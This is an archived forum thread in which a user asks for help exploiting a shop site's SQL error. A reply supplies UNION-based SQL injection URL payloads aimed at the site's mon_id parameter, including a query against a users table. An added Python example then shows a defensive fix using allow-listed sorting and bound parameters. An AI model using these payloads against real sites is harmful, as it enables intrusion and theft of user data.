SQL inj Error

Posted: Tue Jun 24, 2008 3:23 pm
w0rm
Active user
Joined: Feb 22, 2008
Posts: 49

Hi, I need help with this injection, for this SQL error
Code:
index.php?pg=1&mon_id=31&lort=6a
Code:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'limit 0, 40' at line 1
select p.products_image, m.manufacturers_name, pd.products_name, p.products_model, p.products_id, p.manufacturers_id, p.products_price, p.products_tax_class_id, p.products_quantity, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from products p, products_description pd, manufacturers m left join specials s on p.products_id = s.products_id where p.products_status = '1' and pd.products_id = p.products_id and pd.language_id = '1' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '31' order by limit 0, 40
Thanks for . . .

Posted: Wed Jun 25, 2008 1:56 am
gibbocool
Advanced user
Joined: Jan 22, 2008
Posts: 208

Hmm, I'm not too sure here... but I can see a few possibilities.
Code:
index.php?pg=1&mon_id=31' UNION+[insert your query here]--+
Your query could be SELECT+1,2,3+FROM+users
etc.
If that doesn't work then they are probably escaping the single quote, and then I'm not sure where you can go from there except trying some random things. One last thing that might work:
Code:
index.php?pg=1&lort=6a&mon_id=31' UNION+[insert your query here]--+
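
Added example, not part of either post or of the site's code: the error quoted in the first post ends in `order by limit 0, 40`, an ORDER BY with no column, and the listing query carries the manufacturer id as quoted text. This Python sketch (sqlite3 standing in for the PHP/MySQL application) builds the same kind of listing with the sort code mapped through an allow-list and every value bound as a parameter; the `lort` format, the column mapping and the sample rows are assumptions.

```python
import re
import sqlite3

# Assumption: `lort` is "<column number><a|d>"; this column mapping is hypothetical.
SORT_COLUMNS = {1: "pd.products_name", 2: "p.products_model", 3: "p.products_price"}
DEFAULT_ORDER = "pd.products_name ASC"

def order_clause(lort):
    """Translate the sort code into an allow-listed ORDER BY term."""
    m = re.fullmatch(r"([0-9]{1,2})([ad])", lort or "")
    column = SORT_COLUMNS.get(int(m.group(1))) if m else None
    if column is None:
        return DEFAULT_ORDER  # unknown code ("6a") never yields an empty ORDER BY
    return f"{column} {'ASC' if m.group(2) == 'a' else 'DESC'}"

def parse_id(value):
    """Accept only a short run of ASCII digits for mon_id."""
    if not re.fullmatch(r"[0-9]{1,9}", value or ""):
        raise ValueError("mon_id must be a non-negative integer")
    return int(value)

def list_products(db, mon_id, lort, offset=0, limit=40):
    # Only the allow-listed ORDER BY term is interpolated; values are bound.
    sql = (
        "SELECT pd.products_name, p.products_model, p.products_price "
        "FROM products p JOIN products_description pd "
        "ON pd.products_id = p.products_id "
        "WHERE p.products_status = 1 AND p.manufacturers_id = ? "
        f"ORDER BY {order_clause(lort)} LIMIT ?, ?"
    )
    return db.execute(sql, (parse_id(mon_id), offset, limit)).fetchall()

def demo_db():
    """Constructed sample data, not taken from the site in the thread."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (products_id INTEGER, products_model TEXT,
            products_price REAL, products_status INTEGER, manufacturers_id INTEGER);
        CREATE TABLE products_description (products_id INTEGER, products_name TEXT);
        INSERT INTO products VALUES (1,'M-1',30.0,1,31),(2,'M-2',10.0,1,31),(3,'M-3',20.0,1,7);
        INSERT INTO products_description VALUES (1,'Widget'),(2,'Anvil'),(3,'Bolt');
    """)
    return db

if __name__ == "__main__":
    print(list_products(demo_db(), "31", "6a"))
```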